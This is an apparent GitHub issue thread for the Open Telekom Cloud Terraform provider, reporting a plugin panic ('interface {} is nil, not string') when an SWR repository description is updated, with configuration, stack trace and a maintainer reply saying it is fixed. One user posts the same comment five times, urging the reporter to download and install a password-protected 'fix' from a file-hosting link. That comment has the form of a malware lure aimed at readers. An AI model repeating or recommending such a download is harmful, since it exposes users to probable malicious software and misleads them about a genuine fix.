### ISSUE TITLE
Receive "Plugin did not respond" when update SWR repository

### ISSUE THREAD

**Issue by hoangd-nguyen** [opentelekomcloud/terraform-provider-opentelekomcloud#2641]
# Terraform provider version
1.9.5

# Affected Resource(s)
opentelekomcloud_swr_repository_v2

# Terraform Configuration Files
```hcl
# Copy-paste your Terraform configurations here - for large Terraform configs,
# please use a service like Dropbox and share a link to the ZIP file. For
# security, you can also encrypt the files using our GPG public key.
```

# Debug Output/Panic Output

`resource "opentelekomcloud_swr_organization_v2" "organization" {
  name = "some-organization"
}

resource "opentelekomcloud_swr_repository_v2" "repo" {
  organization = opentelekomcloud_swr_organization_v2.organization.name
  name         = "some-repo"
  description  = "Some repository"
  category     = "other"
  is_public    = false
}`

# Steps to Reproduce

Change swr repo description
1. `terraform apply`

# Expected Behavior

Everything should work

# Actual Behavior

`╷
│ Error: Plugin did not respond
│ 
│   with opentelekomcloud_swr_repository_v2.repo,
│   on main.tf line 174, in resource "opentelekomcloud_swr_repository_v2" "repo":
│  174: resource "opentelekomcloud_swr_repository_v2" "repo" {
│ 
│ The plugin encountered an error, and failed to respond to the plugin.(*GRPCProvider).ApplyResourceChange call. The plugin logs may contain more details.
╵

Stack trace from the terraform-provider-opentelekomcloud_v1.36.17 plugin:

panic: interface conversion: interface {} is nil, not string

goroutine 96 [running]:
github.com/opentelekomcloud/terraform-provider-opentelekomcloud/opentelekomcloud/services/swr.resourceRepositoryUpdate({0x1975a68, 0xc00091d7a0}, 0x0?, {0x16b3c80?, 0xc00094a8c0?})
	github.com/opentelekomcloud/terraform-provider-opentelekomcloud/opentelekomcloud/services/swr/resource_opentelekomcloud_swr_repository_v2.go:158 +0x3f4
github.com/hashicorp/terraform-plugin-sdk/v2/helper/schema.(*Resource).update(0xc0002927e0, {0x1975aa0, 0xc000841dd0}, 0xd?, {0x16b3c80, 0xc00094a8c0})
	github.com/hashicorp/terraform-plugin-sdk/v2@v2.24.1/helper/schema/resource.go:741 +0x12e
github.com/hashicorp/terraform-plugin-sdk/v2/helper/schema.(*Resource).Apply(0xc0002927e0, {0x1975aa0, 0xc000841dd0}, 0xc000856c30, 0xc0007a3180, {0x16b3c80, 0xc00094a8c0})
	github.com/hashicorp/terraform-plugin-sdk/v2@v2.24.1/helper/schema/resource.go:847 +0x845
github.com/hashicorp/terraform-plugin-sdk/v2/helper/schema.(*GRPCProviderServer).ApplyResourceChange(0xc0000aad98, {0x1975aa0?, 0xc000841cb0?}, 0xc000b819a0)
	github.com/hashicorp/terraform-plugin-sdk/v2@v2.24.1/helper/schema/grpc_provider.go:1021 +0xe8d
github.com/hashicorp/terraform-plugin-go/tfprotov5/tf5server.(*server).ApplyResourceChange(0xc000797900, {0x1975aa0?, 0xc0008414a0?}, 0xc0002b68c0)
	github.com/hashicorp/terraform-plugin-go@v0.14.1/tfprotov5/tf5server/server.go:818 +0x574
github.com/hashicorp/terraform-plugin-go/tfprotov5/internal/tfplugin5._Provider_ApplyResourceChange_Handler({0x164d540?, 0xc000797900}, {0x1975aa0, 0xc0008414a0}, 0xc0002b6850, 0x0)
	github.com/hashicorp/terraform-plugin-go@v0.14.1/tfprotov5/internal/tfplugin5/tfplugin5_grpc.pb.go:385 +0x170
google.golang.org/grpc.(*Server).processUnaryRPC(0xc0001ba000, {0x197b660, 0xc0001f8000}, 0xc000afcfc0, 0xc0002c5920, 0x22fbd00, 0x0)
	google.golang.org/grpc@v1.56.3/server.go:1335 +0xdf3
google.golang.org/grpc.(*Server).handleStream(0xc0001ba000, {0x197b660, 0xc0001f8000}, 0xc000afcfc0, 0x0)
	google.golang.org/grpc@v1.56.3/server.go:1712 +0xa36
google.golang.org/grpc.(*Server).serveStreams.func1.1()
	google.golang.org/grpc@v1.56.3/server.go:947 +0xca
created by google.golang.org/grpc.(*Server).serveStreams.func1
	google.golang.org/grpc@v1.56.3/server.go:958 +0x15c

Error: The terraform-provider-opentelekomcloud_v1.36.17 plugin crashed!
`

# Important Factoids

opentelekomcloud v1.36.17

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by artem-lifshits** [comment]
Hello @hoangd-nguyen fixed in latest release.
